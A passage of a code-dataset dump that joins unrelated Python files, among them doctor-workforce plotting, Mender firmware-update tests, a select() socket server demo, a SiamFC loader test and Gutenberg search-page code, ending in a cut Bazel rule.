fig.update_xaxes(title_text=\"연도\") \n return fig\n\n# 연간 은퇴 의사수\ndef getDataframe2(dfRetirePerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfRetirePerson[0]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n\n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfRetirePerson[1]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n\n bothdoc = dfRetirePerson[2]\n index = list(range(1950,2048))\n bothdoc = bothdoc.set_index([index])\n return [manDoc, womDoc, bothdoc]\n\ndef makeFigureRetireDoc(dfRetirePerson):\n fig = go.Figure()\n \n year = list(range(1950, 2048))\n docData =getDataframe2(dfRetirePerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='남성'))\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='여성'))\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='전체'))\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"은퇴 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n return fig\n\n# 연간 사망 의사수\ndef getDataframe3(dfDeadPerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfDeadPerson[0]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n \n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfDeadPerson[1]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n \n bothdoc = dfDeadPerson[2]\n index = list(range(1950,2048))\n bothdoc = bothdoc.set_index([index])\n return [manDoc, womDoc, bothdoc]\n\ndef makeFigureDeadDoc(dfDeadPerson):\n fig = go.Figure()\n \n year = list(range(1950, 2048))\n docData =getDataframe3(dfDeadPerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='남성'))\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='여성'))\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='전체'))\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n )) \n\n fig.update_yaxes(title_text=\"사망 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n return fig\n\n# 연간 신규 의사수\ndef getDataframe4(dfNewPerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfNewPerson[0]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n \n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfNewPerson[1]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n \n bothdoc = dfNewPerson[2]\n index = list(range(1950,2048))\n bothdoc = bothdoc.set_index([index])\n return [manDoc, womDoc, bothdoc]\n\ndef makeFigureNewDoc(dfNewPerson):\n fig = go.Figure()\n \n year = list(range(1950, 2048))\n docData =getDataframe4(dfNewPerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='남성'))\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='여성'))\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='전체'))\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"신규 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n return fig","sub_path":"graphpkg/doctorGraph.py","file_name":"doctorGraph.py","file_ext":"py","file_size_in_byte":16521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"176425592","text":"#!/usr/bin/python\n# Copyright 2017 Northern.tech AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom fabric.api import *\nimport pytest\nimport time\nfrom ..common import *\nfrom ..common_setup import *\nfrom ..helpers import Helpers\nfrom ..MenderAPI import auth_v2, deploy, image, logger\nfrom .common_update import common_update_procedure\nfrom .mendertesting import MenderTesting\n\n@pytest.mark.usefixtures(\"standard_setup_one_client_bootstrapped\")\nclass TestFailures(MenderTesting):\n\n @MenderTesting.slow\n def test_update_image_id_already_installed(self, install_image=conftest.get_valid_image()):\n \"\"\"Uploading an image with an incorrect name set results in failure and rollback.\"\"\"\n\n if not env.host_string:\n execute(self.test_update_image_id_already_installed,\n hosts=get_mender_clients(),\n install_image=install_image)\n return\n\n with Helpers.RebootDetector() as reboot:\n deployment_id, expected_image_id = common_update_procedure(install_image, True)\n reboot.verify_reboot_performed()\n\n devices_accepted_id = [device[\"id\"] for device in auth_v2.get_devices_status(\"accepted\")]\n deployment_id = deploy.trigger_deployment(name=\"New valid update\",\n artifact_name=expected_image_id,\n devices=devices_accepted_id)\n\n deploy.check_expected_statistics(deployment_id, \"already-installed\", len(get_mender_clients()))\n deploy.check_expected_status(\"finished\", deployment_id)\n\n @MenderTesting.fast\n def test_large_update_image(self):\n \"\"\"Installing an image larger than the passive/active parition size should result in a failure.\"\"\"\n if not env.host_string:\n execute(self.test_large_update_image, hosts=get_mender_clients())\n return\n\n with Helpers.RebootDetector() as reboot:\n deployment_id, _ = common_update_procedure(install_image=\"large_image.dat\")\n deploy.check_expected_statistics(deployment_id, \"failure\", len(get_mender_clients()))\n reboot.verify_reboot_not_performed()\n deploy.check_expected_status(\"finished\", deployment_id)\n","sub_path":"tests/tests/test_image_update_failures.py","file_name":"test_image_update_failures.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"12887354","text":"from utils.ExceptionHandling import WRITER_ALREADY_EXISTS\nfrom utils.ReaderWriterConstants import \\\n PATH_TO_FILE, WRITE_MODE, END_ARRAY, \\\n BEGIN_ARRAY, COMMA, END_LINE, READER_CONSTANT\nfrom utils.TrialConstants import TRIAL, \\\n LIGHT_TRIAL, STRONG_TRIAL, EXTRA_TRIAL, camel_to_snake\nfrom trialsfactory.writerserializers.ExtraTrialJsonSerializer \\\n import ExtraTrialJsonSerializer\nfrom trialsfactory.writerserializers.TrialJsonSerializer \\\n import TrialJsonSerializer\nimport os\n\n\nclass JsonTrialWriter:\n __TRIAL_JSON_SERIALIZERS_DICT = {TRIAL: TrialJsonSerializer(),\n LIGHT_TRIAL: TrialJsonSerializer(),\n STRONG_TRIAL: TrialJsonSerializer(),\n EXTRA_TRIAL: ExtraTrialJsonSerializer()}\n\n def __init__(self, *args):\n writer = args[READER_CONSTANT]\n if os.path.isfile(PATH_TO_FILE + writer):\n raise ValueError(WRITER_ALREADY_EXISTS + writer)\n self.writer = open(PATH_TO_FILE + writer, mode=WRITE_MODE)\n self.writer.write(BEGIN_ARRAY)\n self.first = True\n\n def __enter__(self):\n return self\n\n def write_trial(self, trial):\n json_trial = JsonTrialWriter.__TRIAL_JSON_SERIALIZERS_DICT \\\n .get(camel_to_snake(trial.__class__.__name__)) \\\n .serialize(trial)\n if self.first:\n self.writer.write(json_trial)\n self.first = False\n else:\n self.writer.write(\n COMMA + END_LINE + json_trial)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.writer.write(END_ARRAY)\n self.writer.close()\n","sub_path":"threads2/writers/JsonTrialWriter.py","file_name":"JsonTrialWriter.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"361747681","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'community'\nurlpatterns = [\n path('', views.index, name='index'),\n path('detail//', views.detail, name='detail'),\n path('new//', views.new, name='new'),\n path('finish/', views.finish, name='finish'),\n path('error/', views.error, name='error'),\n]","sub_path":"SServer/Server/community/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"196846507","text":"import sys\nfor s in sys.stdin:\n try:\n n = int(s)\n d = 3\n a1 = 2\n an = a1 + (n-1)*d\n sums = (a1 + an)/2 * n\n print(int(sums))\n except:\n print(-1)","sub_path":"4.面试/1.华为机试/HJ100.等差数列.py","file_name":"HJ100.等差数列.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"168066923","text":"# coding: utf-8 \n\n\"\"\"\nServer\nExplain how to use select\n\"\"\"\nimport select\nimport socket\nimport Queue\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\nserver = socket.socket()\nserver.setblocking(False)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.bind(('localhost', 6000))\nserver.listen(10)\n\n\nins = [server]\nouts = []\nexcps = []\ntimeout = 10\n\nmsg = {}\n\nwhile 1:\n\tr, w, e = select.select(ins, outs, excps, timeout)\n\tfor s in r:\n\t\tif s is server:\n\t\t\tconn, cli_addr = s.accept()\n\t\t\tconn.setblocking(False)\n\t\t\tins.append(conn)\n\t\t\tmsg[conn] = Queue.Queue()\n\t\telse:\n\t\t\tdata = s.recv(1024)\n\t\t\tif data:\n\t\t\t\tmsg[s].put(data)\n\t\t\t\tif s not in outs:\n\t\t\t\t\touts.append(s)\n\t\t\telse:\n\t\t\t\tins.remove(s)\n\t\t\t\tif s in outs:\n\t\t\t\t\touts.remove(s)\n\t\t\t\ts.close()\n\t\t\t\tdel msg[s]\n\tfor s in w:\n\t\ttry:\n\t\t\tdata = msg[conn].get_nowait()\n\t\texcept Queue.Empty:\n\t\t\touts.remove(s)\n\t\telse:\n\t\t\ts.write(data)\n\tfor s in excps:\n\t\ts.close()\n\t\touts.remove(s)\n\t\tif s in ins:\n\t\t\tins.remove(s)\n\t\tif s in outs:\n\t\t\touts.remove(s)\n\t\tdel msg[s]\n\n","sub_path":"python/io_multiplexing/select_demo.py","file_name":"select_demo.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"506833383","text":"# ------------------------------------------------------------------------------\n# Copyright (c) Microsoft\n# Licensed under the MIT License.\n# Written by Houwen Peng and Zhipeng Zhang\n# Email: houwen.peng@microsoft.com\n# Details: SiamFC training script\n# ------------------------------------------------------------------------------\n\nimport _init_paths\nimport argparse\nimport pprint\n\nfrom torch.utils.data import DataLoader\n\nfrom core.config import config, update_config\nfrom dataset.siamfc import SiamFCDataset\nfrom utils.utils import create_logger\n\neps = 1e-5\ndef parse_args():\n \"\"\"\n args for training.\n \"\"\"\n parser = argparse.ArgumentParser(description='Train SiamFC')\n # general\n parser.add_argument('--cfg', required=True, type=str, default='/home/syh/siamdw/experiments/train/SiamFC.yaml', help='yaml configure file name')\n\n args, rest = parser.parse_known_args()\n # update config\n update_config(args.cfg)\n\n parser.add_argument('--gpus', type=str, help='gpus')\n parser.add_argument('--workers', type=int, help='num of dataloader workers')\n\n args = parser.parse_args()\n\n return args\n\n\ndef reset_config(config, args):\n \"\"\"\n set gpus and workers\n \"\"\"\n if args.gpus:\n config.GPUS = args.gpus\n if args.workers:\n config.WORKERS = args.workers\n\ndef main():\n # [*] args, loggers and tensorboard\n args = parse_args()\n reset_config(config, args)\n\n logger, _, tb_log_dir = create_logger(config, 'SIAMFC', 'train')\n logger.info(pprint.pformat(args))\n logger.info(pprint.pformat(config))\n\n # parallel\n gpus = [int(i) for i in config.GPUS.split(',')]\n gpu_num = len(gpus)\n logger.info('GPU NUM: {:2d}'.format(len(gpus)))\n logger.info('model prepare done')\n\n # build dataloader, benefit to tracking\n train_set = SiamFCDataset(config)\n train_loader = DataLoader(train_set, batch_size=config.SIAMFC.TRAIN.BATCH * gpu_num, num_workers=config.WORKERS,pin_memory=True, sampler=None)\n\n nCount=0\n for iter, input in enumerate(train_loader):\n # measure data loading time\n\n # input and output/loss\n label_cls = input[2]\n template = input[0]\n search = input[1]\n nCount=nCount+1\n\n if nCount==5:\n break\n\n print('=====')\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","sub_path":"siamese_tracking/data_gen_test.py","file_name":"data_gen_test.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74982510","text":"from components.interfaces.SequentialMatcher import SequentialMatcher\n\n# python packages\nimport numpy as np\nimport traceback\n\n#print(\"Number of processors: \", mp.cpu_count())\n\nclass Wrapper(SequentialMatcher):\n\n def __init__(self, match, gap, egap, first_rows_fill_func = None, dmax=64):\n self.match = match\n self.gap = gap\n self.egap = egap\n self.matrices = None\n self.dmax = dmax\n if(first_rows_fill_func is None):\n self._first_rows_fill_func=self.fillUpFirstRows\n else:\n self._first_rows_fill_func =first_rows_fill_func\n def initialize(self, to, what):\n message = \"Matcher is being initalized\"\n #is it necessary at all?\n\n self.im1=to\n self.im2 = what\n self.rows = int(to.shape[0])\n self.columns = int(to.shape[1])\n\n self.initializeMatrices(to, what)\n\n message = \"Matcher has been initialized.\"\n print(message)\n\n def initializeMatrices(self, img1, img2):\n assert (img1.shape == img2.shape), \"The passed images don't have the same dimensions.\"\n\n self.initializeMatrixTemplate(img1[0], img2[0])\n self.matrices = []\n for row in range(self.rows):\n self.matrices.append(self.rowMatrixTemplate.copy())\n print(len(self.matrices))\n\n\n def initializeMatrixTemplate(self, s1, s2):\n\n self.rowMatrixTemplate = {}\n self.rowMatrixTemplate[\"scores\"] = np.zeros([len(s1) + 1, len(s2) + 1])\n #self.rowMatrixTemplate[\"scores\"] .fill(np.finfo(\"d\").min)\n self.rowMatrixTemplate[\"moves\"] = np.zeros([len(s1) + 1, len(s2) + 1])\n #as it is going horizontally: 2=left\n self.maclean_moves(self.rowMatrixTemplate[\"moves\"])\n self._first_rows_fill_func(self, self.rowMatrixTemplate[\"scores\"])\n #self._first_rows_fill_func(self, self.rowMatrixTemplate[\"scores\"].T)\n\n self.rowMatrixTemplate[\"tracebackPath\"] = None\n self.rowMatrixTemplate[\"tracebackIndices\"] = {0: [-1, 0], 1: [-1, -1], 2: [0, -1]}\n self.rowMatrixTemplate[\"tracebackMapping\"] = {0: \"top\", 1: \"diag\", 2: \"left\"}\n\n\n\n def alignImagesBody(self, i):\n mmmatches = 0\n currentMatrices = self.matrices[i]\n\n for index1 in range(1, int(self.columns+1)):\n\n starting_index = 1 if index1 <= self.dmax + 1 else index1 - self.dmax\n\n for index2 in range(starting_index, index1+1):\n #if(not index1-index2>=0):\n # break\n #if(not index1-index2self.dmax):\n # break\n mismatch = int(-np.abs(int(self.im1[i, int(index1-1)]) - int(self.im2[i, int(index2-1)])))\n diagScoreBase = currentMatrices[\"scores\"][int(index1 - 1), int(index2 - 1)]\n diagScore = diagScoreBase + self.match + mismatch\n\n northMove = currentMatrices[\"moves\"][int(index1-1), index2]\n northScoreAdd = self.egap if northMove == 0 else self.gap\n northScore = currentMatrices[\"scores\"][int(index1-1), index2] + northScoreAdd\n\n # westScore\n westMove = currentMatrices[\"moves\"][index1, int(index2-1)]\n westScoreAdd = self.egap if westMove == 2 else self.gap\n westScore = currentMatrices[\"scores\"][index1, int(index2-1)] +westScoreAdd\n\n results = np.array([northScore, diagScore, westScore])\n\n max_element_index = np.argmax(results)\n\n\n max_element_value = results[max_element_index]\n\n currentMatrices[\"scores\"][index1, index2] = max_element_value\n currentMatrices[\"moves\"][index1, index2] = max_element_index\n self.getTracebackPath(i)\n return {i: self.matrices[i]}\n\n def fillUpFirstRows(self, matrix):\n for i in range(len(matrix[0])):\n if (i == 1):\n matrix[0, i] = self.gap\n if(i>1):\n matrix[0, i] = self.gap+self.egap*(i-1)\n\n def fillUpFirstRows2(self, matrix):\n for i in range(len(matrix[0])):\n matrix[0, i] = self.gap * (i)\n\n def fillUpFirstRows3(self, matrix):\n for i in range(len(matrix[0])):\n matrix[0, i] = self.gap*self.columns\n\n def maclean_init(self, matrix):\n for i in range(0, matrix.shape[0]):\n matrix[i:, i] = np.array([(i) * self.gap for i in range(i, matrix.shape[0])]).T\n matrix[i, i:] = np.array([(i) * self.gap for i in range(i, matrix.shape[1])])\n\n def maclean_moves(self, matrix):\n for i in range(0, matrix.shape[0]):\n matrix[i:, i] = 0\n matrix[i, i:] = 2\n def alignImages(self):\n for i in range(0, self.rows):\n self.alignImagesBody(i)\n self.generateDisparity()\n\n def getTracebackStart(self, currentIndex):\n\n yMaxIndex = np.argmax(self.matrices[currentIndex][\"scores\"][:, self.columns])\n xMaxIndex = np.argmax(self.matrices[currentIndex][\"scores\"][self.columns, :])\n\n yMaxValue = self.matrices[currentIndex][\"scores\"][yMaxIndex, self.columns]\n xMaxValue = self.matrices[currentIndex][\"scores\"][self.columns, xMaxIndex]\n\n return (yMaxIndex, self.columns) if (yMaxValue > xMaxValue) else (self.columns, xMaxIndex)\n\n def getTracebackPath(self, currentIndex):\n curY, curX = self.getTracebackStart(currentIndex)\n\n moves = list()\n while (curY != 0 and curX != 0):\n previousMove = int(self.matrices[currentIndex][\"moves\"][curY, curX])\n try:\n nexCoordinates = self.matrices[currentIndex][\"tracebackIndices\"][previousMove]\n except:\n print(\"There has been an error with the following previous move:\")\n print(previousMove)\n\n curY += nexCoordinates[0]\n curX += nexCoordinates[1]\n # message = \"Traceback starging indices: %d %d\"%(curX, curY)\n # warnings.warn(message)\n moves.append(self.matrices[currentIndex][\"tracebackMapping\"][previousMove])\n\n self.matrices[currentIndex][\"tracebackPath\"] = list(reversed(moves))\n\n def generateDisparity(self):\n try:\n scanlines = np.zeros(self.im1.shape)\n\n for index in range(len(self.matrices)):\n scanline = np.zeros(self.columns)\n\n lefts = 0\n tops = 0\n currentPixel = 0\n\n for direction in self.matrices[index][\"tracebackPath\"]:\n if (direction == \"left\"):\n lefts += 1\n elif (direction == \"top\"):\n tops += 1\n scanline[currentPixel] = 0\n currentPixel += 1\n elif (direction == \"diag\"):\n scanline[currentPixel] = np.abs(lefts - tops) # + self.im1[index, int(currentPixel)]\n currentPixel += 1\n else:\n print(\"Something is not right here!\")\n raise Exception\n scanlines[index] = scanline\n\n self.lastDisparity = np.asarray(scanlines)\n except(Exception):\n print(\"Unexpected error.\")\n traceback.print_exc()\n\n\n\n","sub_path":"components/matchers/OriginalMatcher3.py","file_name":"OriginalMatcher3.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111008555","text":"from chatbot import *\nfrom newspaper import Article\nimport random\nimport string\nimport numpy as np\nimport warnings\nimport nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nwarnings.filterwarnings('ignore')\n\nnltk.download('punkt',quiet=True)\nnltk.download('wordnet',quiet=True)\n\narticle = Article('https://www.pharmaceutical-journal.com/news-and-analysis/features/everything-you-should-know-about-the-coronavirus-outbreak/20207629.article?firstPass=false')\narticle.download()\narticle.parse()\narticle.nlp()\ncorpus = article.text\n#dividing the senteses \ntext = corpus\nsent_tokens = nltk.sent_tokenize(text)\n#creating a dictionary to remove the punction\nremove_punct_dict = dict((ord(punct), None) for punct in string.punctuation)\n\n#a function that returns lower case words\ndef LemNormalize(text):\n return nltk.word_tokenize(text.lower().translate(remove_punct_dict))\n\ndef responce(user_responce):\n user_responce = text.lower()\n robo_responce = ''\n sent_tokens.append(user_responce)\n tfidfvec = TfidfVectorizer(tokenizer=LemNormalize, stop_words = 'english')\n tfidf = tfidfvec.fit_transform(sent_tokens)\n val = cosine_similarity(tfidf[-1], tfidf)\n idx = val.argsort()[0][-2]\n flat = val.flatten()\n flat = val.sort()\n score = flat[-2]\n if score == 0:\n robo_responce = responce + \"sory, idont understand\"\n speak(robo_responce)\n else:\n robo_responce = robo_responce + sent_tokens[idx]\n speak(robo_responce)\n sent_tokens.remove(text)\n return robo_responce\n\n# greetings_input = [\"hi\", \"hello\", \"hey\", \"hola\"]\n# greetings_responce = [\"hey\", \"hey there\", \"hi\", \"hello\"]\n# def greeting(sentese):\n# for word in sentese.split():\n# return random.choice(greetings_responce)\n\n\n\n \n\n\n\n","sub_path":"bot/Articles.py","file_name":"Articles.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609252288","text":"#!/usr/bin/env python\n# -*- mode: python; indent-tabs-mode: nil; -*- coding: utf-8 -*-\n\n\"\"\"\nPage.py\n\nCopyright 2009-2010 by Marcello Perathoner\n\nDistributable under the GNU General Public License Version 3 or newer.\n\nBase class for all pages.\n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nimport cherrypy\n\nfrom libgutenberg.MediaTypes import mediatypes as mt\nfrom libgutenberg.GutenbergDatabase import DatabaseError\n\nimport BaseSearcher\nimport Formatters\n\nclass Page (object):\n \"\"\" Base for all pages. \"\"\"\n\n def __init__ (self):\n self.supported_book_mediatypes = [ mt.epub, mt.mobi ]\n\n\n @staticmethod\n def format (os):\n \"\"\" Output page. \"\"\"\n return Formatters.formatters[os.format].format (os.template, os)\n\n\n def client_book_mediatypes (self):\n \"\"\" Return the book mediatypes accepted by the client. \"\"\"\n client_accepted_book_mediatypes = []\n\n accept_header = cherrypy.request.headers.get ('Accept')\n\n if accept_header is None:\n client_accepted_book_mediatypes = self.supported_book_mediatypes\n else:\n #cherrypy.log (\"Accept: %s\" % accept_header,\n # context = 'REQUEST', severity = logging.DEBUG)\n\n client_accepted_book_mediatypes = []\n accepts = cherrypy.request.headers.elements ('Accept')\n for accept in accepts:\n if accept.value in self.supported_book_mediatypes:\n if accept.qvalue > 0:\n client_accepted_book_mediatypes.append (accept.value)\n\n return client_accepted_book_mediatypes\n\n\nclass NullPage (Page):\n \"\"\" An empty page. \"\"\"\n\n def index (self, **dummy_kwargs):\n \"\"\" Output an empty page. \"\"\"\n return ''\n\n\nclass SearchPage (Page):\n \"\"\" Abstract base class for all search page classes. \"\"\"\n\n def setup (self, dummy_os, dummy_sql):\n \"\"\" Let derived classes setup the query. \"\"\"\n raise NotImplementedError\n\n def fixup (self, os):\n \"\"\" Give derived classes a chance to further manipulate database results. \"\"\"\n pass\n\n def finalize (self, os):\n \"\"\" Give derived classes a chance to fix default finalization. \"\"\"\n pass\n\n def nothing_found (self, os):\n \"\"\" Give derived class a chance to react if no records were found. \"\"\"\n os.entries.insert (0, self.no_records_found (os))\n\n\n def output_suggestions (self, os, max_suggestions_per_word = 3):\n \"\"\" Make suggestions. \"\"\"\n\n # similarity == matching_trigrams / (len1 + len2 - matching_trigrams)\n\n sql_query = \"\"\"\n SELECT\n word,\n nentry,\n similarity (word, %(word)s) AS sml\n FROM terms\n WHERE word %% %(word)s\n ORDER BY sml DESC, nentry DESC LIMIT %(suggestions)s;\"\"\"\n\n q = os.query.lower ()\n sugg = []\n for word in q.split ():\n if len (word) > 3:\n try:\n rows = BaseSearcher.SQLSearcher().execute (\n sql_query,\n { 'word': word, 'suggestions': max_suggestions_per_word + 1})\n for i, row in enumerate (rows):\n if i >= max_suggestions_per_word:\n break\n corr = row.word\n if corr != word:\n sugg.append ( (word, corr) )\n except DatabaseError:\n pass\n\n for word, corr in reversed (sugg):\n os.entries.insert (0, self.did_you_mean (os, corr, q.replace (word, corr)))\n\n\n\n def index (self, **kwargs):\n \"\"\" Output a search result page. \"\"\"\n\n os = BaseSearcher.OpenSearch ()\n os.log_request ('search')\n\n if 'default_prefix' in kwargs:\n raise cherrypy.HTTPError (400, 'Bad Request. Unknown parameter: default_prefix')\n\n if os.start_index > BaseSearcher.MAX_RESULTS:\n raise cherrypy.HTTPError (400, 'Bad Request. Parameter start_index too high')\n\n sql = BaseSearcher.SQLStatement ()\n sql.query = 'SELECT *'\n sql.from_ = ['v_appserver_books_4 as books']\n\n # let derived classes prepare the query\n try:\n self.setup (os, sql)\n except ValueError as what:\n raise cherrypy.HTTPError (400, 'Bad Request. ' + str (what))\n\n os.fix_sortorder ()\n\n # execute the query\n try:\n BaseSearcher.SQLSearcher ().search (os, sql)\n except DatabaseError as what:\n cherrypy.log (\"SQL Error: \" + str (what),\n context = 'REQUEST', severity = logging.ERROR)\n raise cherrypy.HTTPError (400, 'Bad Request. Check your query.')\n\n # sync os.title and first entry header\n if os.entries:\n entry = os.entries[0]\n if os.title and not entry.header:\n entry.header = os.title\n elif entry.header and not os.title:\n os.title = entry.header\n\n os.template = os.page = 'results'\n\n # give derived class a chance to tweak result set\n self.fixup (os)\n\n # warn user about no records found\n if os.total_results == 0:\n self.nothing_found (os)\n\n # suggest alternate queries\n if os.total_results < 5:\n self.output_suggestions (os)\n\n # add sort by links\n if os.start_index == 1 and os.total_results > 1:\n if 'downloads' in os.alternate_sort_orders:\n self.sort_by_downloads (os)\n if 'release_date' in os.alternate_sort_orders:\n self.sort_by_release_date (os)\n if 'title' in os.alternate_sort_orders:\n self.sort_by_title (os)\n if 'alpha' in os.alternate_sort_orders:\n self.sort_alphabetically (os)\n if 'quantity' in os.alternate_sort_orders:\n self.sort_by_quantity (os)\n\n os.finalize ()\n self.finalize (os)\n\n if os.total_results > 0:\n # call this after finalize ()\n os.entries.insert (0, self.status_line (os))\n\n return self.format (os)\n\n\n @staticmethod\n def sort_by_downloads (os):\n \"\"\" Append the sort by downloads link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'popular'\n cat.title = _('Sort by Popularity')\n cat.url = os.url_carry (sort_order = 'downloads')\n cat.class_ += 'navlink grayed'\n cat.icon = 'popular'\n cat.order = 4.0\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_alphabetically (os):\n \"\"\" Append the sort alphabetically link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'alphabethical'\n cat.title = _('Sort Alphabetically')\n cat.url = os.url_carry (sort_order = 'alpha')\n cat.class_ += 'navlink grayed'\n cat.icon = 'alpha'\n cat.order = 4.1\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_by_title (os):\n \"\"\" Append the sort alphabetically link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'alphabethical'\n cat.title = _('Sort Alphabetically')\n cat.url = os.url_carry (sort_order = 'title')\n cat.class_ += 'navlink grayed'\n cat.icon = 'alpha'\n cat.order = 4.1\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_by_quantity (os):\n \"\"\" Append the sort by quantity link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'numerous'\n cat.title = _('Sort by Quantity')\n cat.url = os.url_carry (sort_order = 'quantity')\n cat.class_ += 'navlink grayed'\n cat.icon = 'quantity'\n cat.order = 4.2\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_by_release_date (os):\n \"\"\" Append the sort by release date link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'new'\n cat.title = _('Sort by Release Date')\n cat.url = os.url_carry (sort_order = 'release_date')\n cat.class_ += 'navlink grayed'\n cat.icon = 'date'\n cat.order = 4.3\n os.entries.insert (0, cat)\n\n @staticmethod\n def status_line (os):\n \"\"\" Placeholder for status line. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = '__statusline__'\n cat.class_ += 'grayed'\n cat.icon = 'bibrec'\n cat.order = 10\n cat.header = os.title\n cat.title = _(u\"Displaying results {from_}–{to}\").format (\n from_ = os.start_index, to = os.end_index)\n return cat\n\n @staticmethod\n def no_records_found (os):\n \"\"\" Message. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = '__notfound__'\n cat.title = _('No records found.')\n cat.url = os.url ('start')\n cat.class_ += 'navlink grayed'\n cat.icon = 'bibrec'\n cat.order = 11\n return cat\n\n @staticmethod\n def did_you_mean (os, corr, corrected_query):\n \"\"\" Message. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = '__didyoumean__'\n cat.title = _('Did you mean: {correction}').format (correction = corr)\n cat.url = os.url ('search', query = corrected_query)\n cat.class_ += 'navlink'\n cat.icon = 'suggestion'\n cat.order = 12\n return cat\n","sub_path":"Page.py","file_name":"Page.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445284468","text":"# -*- python -*-\n\nload(\n \"@com_google_protobuf//:protobuf.bzl\",\n \"cc_proto_library\",\n \"py_proto_library\",\n)\nload(\n \"@drake//tools/skylark:drake_cc.bzl\",\n \"drake_installed_headers\",\n \"installed_headers_for_drake_deps\",\n)\n\ndef drake_cc_proto_library(\n name,\n srcs = [],\n deps = 